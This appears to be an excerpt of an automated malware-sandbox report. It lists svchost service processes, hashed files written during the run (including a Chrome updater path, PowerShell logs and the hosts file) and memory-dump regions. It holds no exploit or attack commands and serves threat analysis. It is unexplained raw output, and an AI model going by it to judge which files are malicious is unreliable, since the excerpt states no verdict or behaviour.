C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize: 2.6MB
MD5: c0827a7bd617a2fcd31a3d751152c2e0
SHA1: 2d58f48e54e1c54e7b63e7ba2c9f50323994242a
SHA256: 16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b
SHA512: cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A0F.tmp.csv
Filesize: 39KB
MD5: d59ad19576801f3cf664beb1abece8e1
SHA1: 6897c66a3ccdc2168476da0d8adce4d5bd5e690f
SHA256: 0686d9d8238fb3c2fadcc5489a8e01b6fbe8aac44dac4a3510f4f7b327c074d8
SHA512: 441077e6e0520d88dad521e33876eef510cfc746e835a8b178ed706ad86ef9196dd7faacb10daccff5aa659f1b031cef4c6bf59b7c7a2a83c6f75d2215c6db16
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B87.tmp.txt
Filesize: 13KB
MD5: 8df61607f396bda190af2a92c6a794cc
SHA1: ea329e1b82dd340fdad479328b231c78c4832256
SHA256: 44234a112c0735b4d6240bc08d9a4013fd60d8fdca818e208e0ef08e81f6746c
SHA512: 5850807b8627b78ae625548bda3a8d76688e0d0d95650d66709f0d70f576312ec8c113c49718ddf25b6b1e56002b0aa6b077b28e960f74a9c4c8d5397c14577d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BA8.tmp.csv
Filesize: 39KB
MD5: cf603115f3339d15fea53fe118f4880b
SHA1: edcb64d2a2a856b9df6463bdae1e397ebd53c89e
SHA256: c3a8a1cb6419aa5234a6e3cf9265d4ca190b4a6a6b5a4976eeb34d1ec6ea19f1
SHA512: e33b740f3e368d43b15a78df60c323a9c2a588c76de9046fcd6ac024c66b17eb86d4dceedcd025640b130068ea19de540c2ac8a3e3c76c070be1f2a7c27efc68
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C26.tmp.txt
Filesize: 13KB
MD5: d129b6ffcf1bcb520f161c394223dad5
SHA1: 350bee117e9a56039336dc792e38297aba0c4884
SHA256: 7ce7e716a17c9494665eb54d1f4072cb5aa5fd57380727bad4649335520c99cb
SHA512: 9e5548be25000bbde354570f072d1fa0f152ad1e80f7fb9af5cece0d547255fda4ffa826bd24abe583f0064f987c16934c3a34e475dce8d5b73e8ee5687f0fc3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: 440cb38dbee06645cc8b74d51f6e5f71
SHA1: d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA256: 8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA512: 3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: e6b9e03dcde217fc7d1692b3d65233d7
SHA1: 67367ef59dbc1661ff29d6fe5ce3ed3d39678044
SHA256: 790c142b39325b5bcf07c2d7b8afb8fb3b6f8c1e99a39ce5870b2ef043d8cfdd
SHA512: 8f34d037a97f1131ff9863c10ff7cf7f029c2973c5f32fcee1751cd47a5b7cfc3bf5b6c30ada08f3793918e600d4a45f8cb8d22502b693c6a9aeba9d0d504410
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize: 3KB
MD5: 556084f2c6d459c116a69d6fedcc4105
SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 8e7a623fcc311b5017c82b1181911569
SHA1: 048d36afc6481760c53cff348c05744d98f3cce7
SHA256: 9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d
SHA512: 3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 190cc2feb6fbf6a6143f296ebe043de5
SHA1: 8fa72a99c46ed77b602476c85ca2d8ea251b22fb
SHA256: 4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
SHA512: 94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616
-
C:\Windows\system32\drivers\etc\hosts
Filesize: 860B
MD5: 63b960c8d33c756293dfca7f8a2c50f3
SHA1: 958b4e2fc745072879c19de73620b84a8500a190
SHA256: 2f513fa3cf9778985ed1f58d33cc575723825ec57ed91dae1e9aa340b2721969
SHA512: 799747ff0038f8b2d87bead690b2101ca7fa92f84186ece14c0f1d362ece9d89ca7898e390136eb888cc4f052ad21e5c9a78d67d27b76e13740f964d4eebe536
-
memory/4632-153-0x0000000000000000-mapping.dmp
-
memory/4672-392-0x0000000000000000-mapping.dmp
-
memory/4732-143-0x0000000000000000-mapping.dmp
-
memory/4736-242-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmpFilesize
64KB
-
memory/4820-561-0x0000000000000000-mapping.dmp
-
memory/4868-269-0x0000026E8D030000-0x0000026E8D05A000-memory.dmpFilesize
168KB
-
memory/4868-193-0x0000000000000000-mapping.dmp
-
memory/4872-527-0x0000000000000000-mapping.dmp
-
memory/4880-543-0x0000000000000000-mapping.dmp
-
memory/4900-516-0x000000014036EAC4-mapping.dmp
-
memory/4920-551-0x0000000000000000-mapping.dmp
-
memory/4932-505-0x000000014036EAC4-mapping.dmp
-
memory/4948-132-0x0000000000850000-0x0000000000AF8000-memory.dmpFilesize
2.7MB
-
memory/4948-140-0x00000000036D0000-0x00000000036E2000-memory.dmpFilesize
72KB
-
memory/4948-133-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/4948-274-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/4948-277-0x000000001C5E0000-0x000000001C60A000-memory.dmpFilesize
168KB
-
memory/4948-161-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/4996-243-0x00007FF80E8D0000-0x00007FF80E8E0000-memory.dmpFilesize
64KB
-
memory/5004-556-0x0000000000000000-mapping.dmp
-
memory/5024-146-0x0000000000000000-mapping.dmp
-
memory/5032-490-0x0000000000000000-mapping.dmp
-
memory/5056-154-0x0000000000000000-mapping.dmp